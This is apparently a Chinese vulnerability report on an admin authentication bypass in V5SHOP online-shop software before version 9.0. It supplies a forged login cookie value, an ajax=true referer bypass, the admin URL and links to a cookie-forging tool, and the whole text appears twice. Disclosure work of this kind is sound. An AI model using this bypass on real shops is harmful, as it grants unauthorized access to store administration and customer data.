### 简要描述: V5SHOP网店系统 version < 9.0 后台认证绕过。 ### 详细说明: 程序后台的访问控制: 1 获取cookie,使用秘钥解密。确定是否登录 2 监控referer,不过请求中带ajax=true,即可绕过限制 所以我们可以伪造一份加密的cooke,并携带ajax=true去直接访问后台 访问URL: ``` www.xxxx.com/weblogin/index.aspx?ajax=true ``` 伪造cookie: ``` V5ShopLoginID=Z1zZmWmBQL7kg6bn1sIVSbI1tdLbyYJnhapJnu3MQKs= ``` 加密cookie生成工具: ``` http://files.cnblogs.com/zpino/v5shop.rar http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/09/v5shop.rar ``` [<img src="https://images.seebug.org/upload/201309/07203736737325a26156e9357dd7410c96a643a4.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/07203736737325a26156e9357dd7410c96a643a4.jpg) ### 漏洞证明: 需要自己搭个环境测试
### 简要描述: V5SHOP网店系统 version < 9.0 后台认证绕过。 ### 详细说明: 程序后台的访问控制: 1 获取cookie,使用秘钥解密。确定是否登录 2 监控referer,不过请求中带ajax=true,即可绕过限制 所以我们可以伪造一份加密的cooke,并携带ajax=true去直接访问后台 访问URL: ``` www.xxxx.com/weblogin/index.aspx?ajax=true ``` 伪造cookie: ``` V5ShopLoginID=Z1zZmWmBQL7kg6bn1sIVSbI1tdLbyYJnhapJnu3MQKs= ``` 加密cookie生成工具: ``` http://files.cnblogs.com/zpino/v5shop.rar http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/09/v5shop.rar ``` [<img src="https://images.seebug.org/upload/201309/07203736737325a26156e9357dd7410c96a643a4.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/07203736737325a26156e9357dd7410c96a643a4.jpg) ### 漏洞证明: 需要自己搭个环境测试